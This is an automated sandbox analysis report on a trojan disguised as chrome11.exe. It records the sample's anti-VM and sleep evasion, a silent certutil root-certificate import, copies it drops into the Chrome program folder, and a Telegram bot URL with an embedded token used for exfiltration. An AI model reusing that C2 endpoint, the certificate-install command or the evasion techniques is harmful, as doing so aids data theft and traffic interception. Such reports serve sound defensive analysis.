Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\chrome11.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\chrome11.exe	Memory allocated: 103AA0F0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Memory allocated: 103C3AF0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Window / User API: threadDelayed 835			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Window / User API: threadDelayed 753			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe TID: 5420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 5420	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 3532	Thread sleep count: 835 > 30	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 6136	Thread sleep count: 753 > 30	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 5308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe TID: 3552	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: chrome11.exe, 00000001.00000002.2461510465.00000103C4333000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|

Source: C:\Users\user\Desktop\chrome11.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\user\AppData\Local\Temp\tmp267C.tmp"

Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe	Queries volume information: C:\Users\user\Desktop\chrome11.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\chrome11.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\chrome11.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	3 Masquerading	OS Credential Dumping	21 Security Software Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	2 Browser Session Hijacking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
chrome11.exe	32%	ReversingLabs	Win64.Trojan.Ursu

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\Google\Chrome\Application\chrome.exe	32%	ReversingLabs	Win64.Trojan.Ursu
C:\Program Files\Google\Chrome\Application\original.exe (copy)	32%	ReversingLabs	Win64.Trojan.Ursu

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/sendMessage	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://html4/loose.dtd	chrome11.exe, chrome.exe.1.dr	false	high
https://api.telegram.org/bot7587476277:AAEN7p2yOtrq884E9izAnIDu8WeE8vTqRjY/	chrome11.exe, 00000001.00000002.2460149303.00000103ABB07000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	chrome11.exe, 00000001.00000002.2460149303.00000103ABB8F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	chrome11.exe, chrome.exe.1.dr	false	high
http://.css	chrome11.exe, chrome.exe.1.dr	false	high
http://api.telegram.org	chrome11.exe, 00000001.00000002.2460149303.00000103ABBB3000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chrome11.exe, 00000001.00000002.2460149303.00000103ABB8F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://.jpg	chrome11.exe, chrome.exe.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1577377
Start date and time:	2024-12-18 12:51:18 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	chrome11.exe
Detection:	MAL
Classification:	mal84.spre.bank.troj.adwa.evad.winEXE@4/14@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 57% Number of executed functions: 56 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: chrome11.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	FileScanner.exe	Get hash	malicious	Unknown	Browse
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	stealer.jar	Get hash	malicious	Can Stealer	Browse
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	random.exe.6.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FileScanner.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	noll.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	FileScanner.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PK241200518-EMAIL RELEASE-pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	stealer.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	zyEDYRU0jw.exe	Get hash	malicious	Arcane	Browse	149.154.167.220

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Lu4421.exe	Get hash	malicious	Stealerium	Browse	149.154.167.220
	Lu4421.exe	Get hash	malicious	AsyncRAT, DcRat, Stealerium	Browse	149.154.167.220
	http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32	Get hash	malicious	Unknown	Browse	149.154.167.220
	Memo - Impairment Test 2023 MEX010B (5).js	Get hash	malicious	Unknown	Browse	149.154.167.220
	Awb 4586109146.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	PO 0309494059506060609696007.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.220
	urS3jQ9qb5.jar	Get hash	malicious	Can Stealer	Browse	149.154.167.220
	RFQ December-January Forcast and TCL.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	x0EMKX5G1g.exe	Get hash	malicious	PureCrypter, PureLog Stealer	Browse	149.154.167.220

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Program Files\Google\Chrome\Application\original.exe (copy)	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse
C:\Program Files\Google\Chrome\Application\chrome.exe	fWAr4zGUkY.exe	Get hash	malicious	Remcos, Amadey, Stealc	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\Application\chrome.exe

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	5.902097026291253
Encrypted:	false
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
MD5:	5B39766F490F17925DEFAEE5DE2F9861
SHA1:	9C89F2951C255117EB3EEBCD61DBECF019A4C186
SHA-256:	DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
SHA-512:	D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....&..(........s.........s.........s.........s.........s..........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0..B........~.....(......9!...r...p.....(....o....s.............~.....8............0...........~.....8..........."..........Vs....(....t.............(....*.0..

C:\Program Files\Google\Chrome\Application\chrome.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Program Files\Google\Chrome\Application\original.exe (copy)

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4767744
Entropy (8bit):	5.902097026291253
Encrypted:	false
SSDEEP:	98304:DSPVtfXC+vyr+LzwQqnySs6llVYOTGFl5hShc8Q6AAqe6oahURFPvl5JTBEKY6aI:DSLXC+DOTGF/hSx/087
MD5:	5B39766F490F17925DEFAEE5DE2F9861
SHA1:	9C89F2951C255117EB3EEBCD61DBECF019A4C186
SHA-256:	DE615656D7F80B5E01BC6A604A780245CA0CCEFD920A6E2F1439BF27C02B7B7A
SHA-512:	D216FA45C98E423F15C2B52F980FC1C439D365B9799E5063E6B09837B419D197BA68D52EA7FACF469EAE38E531F17BD19EAF25D170465DC41217CA6AB9EB30BF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 32%
Joe Sandbox View:	Filename: fWAr4zGUkY.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....Vg..........".......G...........G.. ....@...... ........................I.......I...`.................................................8.G.T.....H.......................H.......G...............................................G.............. ..H............text.....G.. ....G................. ..`.rsrc.........H.......G.............@..@.reloc........H.......H.............@..BH.........-.`.......!...d.,.t9............................................(....&..(........s.........s.........s.........s.........s..........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0...........~....o.....8...........0..B........~.....(......9!...r...p.....(....o....s.............~.....8............0...........~.....8..........."..........Vs....(....t.............(....*.0..

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\619e693d49fb0ee0f621fb177cb4a39f_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	data
Category:	dropped
Size (bytes):	2285
Entropy (8bit):	7.640796778894534
Encrypted:	false
SSDEEP:	48:HnOYvRl3ULDd4al3m3kOAzib8l96MYzyCjf/tQLIhP9L1YSE:HnOCXoDCal23pb85YzyCD/CKV1YZ
MD5:	F4D7CED636B70B09CAAE7D816F2E3B2A
SHA1:	E28F15B504BA30628844448178E40C8BE47F5857
SHA-256:	F1611028F49875C29A70B74689552336FCCFED3046F00716DEE34649D1F0ABA5
SHA-512:	50AEC173C8A18175A63AEF7CBA8F1F3B1FA3A560B7A4B3AD7771BB049A3F3BF676429562E3A46DE03B9C084D0FEB2CAC5AFFF8C68A5D957BBAD2D18823B7634C
Malicious:	false
Preview:	........I...............P...............Titanium Root Certificate Authority-890dad23-74f6-4dfa-b1b0-a8e579e1959c.....................RSA1................k_(.).C...1........f..#_..,.@"?n._P....mx....Ci....Iv.8......T..C.......-.U.@ ...O.}/`.~.Q...Xg..Fj<qSz...T....C........^<SFp.b.9...T.,...K....;..b...`..........{.Um...A...S.h.W../........c01.t`j.c.e.m..8.wW59.Cj...J\|.<3._..x......\|.....................z..O.........E6I.H..*.{\|......,...C.r.y.p.t.o.A.P.I. .P.r.i.v.a.t.e. .K.e.y....f...... ....7...;.9N.#.#>...(%..-.................. ......s..`.Uq40..p....m.Zb. <..;..P...T....}.$....Sz"..6....O1..UE..@.#.U.v........'.}..SbA~x..z4....V.^#..Mt...soM..x+H,...R...'..%.a,O...j6....a..%i.R...:...R.+.K.v.;..u..L..UM&w0..D.......!.]...#... -%A.\|..4+.9......XnT..(8...U..Y...}h.6 P.%M..)?...Jy;x.[0.b........-.K......(.<..1.Z.!{8..#..L....h.....$.......J.;...)..5H..b;J.....c...s......NgC".V..t<.U..H..F,=......K....`.?oHD.4.@C#..N8.....M.`SEU-..P......

C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\84ef8e32cf3dd22e15e36759d999f0aa_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chrome11.exe.log

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2034
Entropy (8bit):	5.382609664334896
Encrypted:	false
SSDEEP:	48:MxHKQrHNpOYHKGSI6o6+vxp3/elFHptHTHhAHKKkxHB1qHGIs0HKD:iqYtpOYqGSI6o9Zp/elFJtzHeqKkxhw6
MD5:	2BE09B8559C289356470B28D09A3A86D
SHA1:	7CB90D943BD4C993204AB6548039F0F48E82D263
SHA-256:	6899F7B36D91DD203BC84978E434AFDA3B560AB59662BED11BDB0480D6179517
SHA-512:	311E100C3DE17B1DC60FC933E95A28B196BB291FB5C516C5B250E12FAC673DBF34A2AB8A2CD8278AE6B0B25799A94612F0E556AE4C7EE5DDD406CE56A2523869
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.303

C:\Users\user\AppData\Local\Temp\Tmp25EE.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2631
Entropy (8bit):	7.815959757519488
Encrypted:	false
SSDEEP:	48:oaAtXCdGDpgfZk7Uaxzued2LzczqaPbxmWtj0CFCucq6aRVOxRzEo:oEBkhkzPJo0Hu/ro
MD5:	A12753F6CEC814996BAC7340414CC7AB
SHA1:	B8D26B8A17574E6C521E7022F0BF9F77C537C63C
SHA-256:	86B8E8913B84F43144C6CDC08C8307114874518063B4400394413513E761D433
SHA-512:	299C030B89CC21D26C43CE2804AF8DC2A5B60F90B12DFCF006BC2DF57FDA1B24118D8748B6E119EA3EF7DB1A89DFEB651074CA39F0B5A2CD223B7AC686373BD5
Malicious:	false
Preview:	0....0....H........$.....0.0....H........$.....0...0......H............0...0(...H.......0...0..&.CG/.K=S..U...........?..z...C.hV."..L.....E.1(...4......g..L...[3~.5._.....\|..o.~.zo......f....\|..$.d..F.k..=&..}=...am\|.`..+.okr'.1.Nl.rf=...e.........r.....t ...V.q....y....1.0..,.&E..N...........5$_.?1........./.......W+...#,........x.Z..v...j].I......O...e.i........6...a.~.p..H...r......8...}..d...H......M.}Nx.....D>So..p.......?Aflu<.f..[.n0.l$.to.....r.._.....<.....v\|i..j%Uz....1..{.9i....Q.....g.k...`79..&g..CP.......8...I....A}..1........<?`..d..c......B.w..T7..P.J..yM.....=!..g.^.x...t..J.....sX..q).R.i~=.. ..xr.#.N.:.8..C.1...:..$.B....#X..x....8.....~(......[/Yz...\|.Y.....^.q.5.Y.....u[.n...G...\..6.3..]..F...#.c....U.............v...... ..-...Irvn.....]j......@.......y..F..~...A.....N..qS.........(YlY.....TX=....i.Q.......C.@......y.uN.k...........6k......U.4...F.6..tH.}-..Q...k.JHT.RAE.........}co..,cF.#.}%...j.....g.... .]9......

C:\Users\user\AppData\Local\Temp\Tmp260E.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2631
Entropy (8bit):	7.815959757519488
Encrypted:	false
SSDEEP:	48:oaAtXCdGDpgfZk7Uaxzued2LzczqaPbxmWtj0CFCucq6aRVOxRzEo:oEBkhkzPJo0Hu/ro
MD5:	A12753F6CEC814996BAC7340414CC7AB
SHA1:	B8D26B8A17574E6C521E7022F0BF9F77C537C63C
SHA-256:	86B8E8913B84F43144C6CDC08C8307114874518063B4400394413513E761D433
SHA-512:	299C030B89CC21D26C43CE2804AF8DC2A5B60F90B12DFCF006BC2DF57FDA1B24118D8748B6E119EA3EF7DB1A89DFEB651074CA39F0B5A2CD223B7AC686373BD5
Malicious:	false
Preview:	0....0....H........$.....0.0....H........$.....0...0......H............0...0(...H.......0...0..&.CG/.K=S..U...........?..z...C.hV."..L.....E.1(...4......g..L...[3~.5._.....\|..o.~.zo......f....\|..$.d..F.k..=&..}=...am\|.`..+.okr'.1.Nl.rf=...e.........r.....t ...V.q....y....1.0..,.&E..N...........5$_.?1........./.......W+...#,........x.Z..v...j].I......O...e.i........6...a.~.p..H...r......8...}..d...H......M.}Nx.....D>So..p.......?Aflu<.f..[.n0.l$.to.....r.._.....<.....v\|i..j%Uz....1..{.9i....Q.....g.k...`79..&g..CP.......8...I....A}..1........<?`..d..c......B.w..T7..P.J..yM.....=!..g.^.x...t..J.....sX..q).R.i~=.. ..xr.#.N.:.8..C.1...:..$.B....#X..x....8.....~(......[/Yz...\|.Y.....^.q.5.Y.....u[.n...G...\..6.3..]..F...#.c....U.............v...... ..-...Irvn.....]j......@.......y..F..~...A.....N..qS.........(YlY.....TX=....i.Q.......C.@......y.uN.k...........6k......U.4...F.6..tH.}-..Q...k.JHT.RAE.........}co..,cF.#.}%...j.....g.... .]9......

C:\Users\user\AppData\Local\Temp\rootCert.pfx

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	7.789960581649075
Encrypted:	false
SSDEEP:	48:eJIwVKGMjXxNfMaqf0Yt1/sibewKHUdtqrkoDZGm/tipIZHhWXAnsy:Tt7Yr/kAOIoDZbipIhkXAr
MD5:	70ED5DED9277535E2A3B0B104722A8CC
SHA1:	CE1B9EA2945AFB062B37D99DA7DA59C98C2637E1
SHA-256:	F25AED7D5F3B1CD2B0E4322E56B4E2069670D8EE3E51DF001C3EBD4F086E6BD6
SHA-512:	DE34B393FA05204E7619724AD4B860F3E5072ACD2A5FA52636532111CA9FBF3C58DBB7A6588FD51D3BAB4B3CD479E726CE8C148CEA3AE7B363E19C4D7CAC37AB
Malicious:	false
Preview:	0..f...0.."...H..............0...0......H..............0...0......H............0...0....H.......0....,............3.....{U...+..+S.m1.$...Lm.O..-.....Q...%...h..3w.{.@..$..a....7.~'...S.;....w...,.s.;....1.....F.e..H\|8+.q.......\|..;.1.2.V~...-;..;b..8....G....6Z.Q.......B.m: U...&..z..9w.8!...KEk.S..=.....H6..hEw:.........4wSW..-XL...1....HJ.)...2.z..lG..0]..Sm..^q]..#._..JF..8.rO{D..-....U...?.o....Z..gr..L........a..J,...r..55\C..sD.P.F.G..n.o..Z:.H.o.x.4..Umm..{..1..kU.i.<..kqn3...;..f.S"..(.I.D.........I..oF..s...b %.Q...'...eT.G..J..KD..}q..K...H\e.5].X....h.....`z,.....qrD.!8....mM..j..5T..F..#F=EV..;.0\..".7@..J..?]sSPL.S=..Q.L0)..7.Sy.~".9c.&S..B..2.....Y..e.F...%O..........Y..p..`..nYj.v.8..IR..1........."3o. ..m.J.......b.Hd......e....<.r..5...\...7l...P....[d..#.K...... N.W.[.b\|.r.p..?...j.X.....Lt".L...^-cGW.J....].0...]..,/...3.W.:......;$.3.9....CC.....F..X.....W......O.E\....Z......d...Z.3..D....=%.*....k...].[..E=E

C:\Users\user\AppData\Local\Temp\tmp267C.tmp

Download File

Process:	C:\Users\user\Desktop\chrome11.exe
File Type:	data
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	7.8068446658501705
Encrypted:	false
SSDEEP:	48:eJKT/MaXcZuEMigjylSORgMKQhsV5IfqiT42ugwKvEzd2u5B1K:VDMbZ4el8QhsV6CT2ug7IdJK
MD5:	0BDE9C9DBF12F50BC80E2F69F2B09C57
SHA1:	6FE7AC5F9F59146AC9F5251B24307F8ECE8EBA79
SHA-256:	EB62D1B4CEAA3C9664E2CB69782D583103A02EFB9F260AE4ABD0AEAA9E79FE48
SHA-512:	61A7A9317C00F31E113FA6D8CB2AE069C2683BA324527EC984FEFCE251751E5A21E09100A90FD88C41EF9B331F321D2CA99EAAF06D8897B45C66202D803D45B2
Malicious:	false
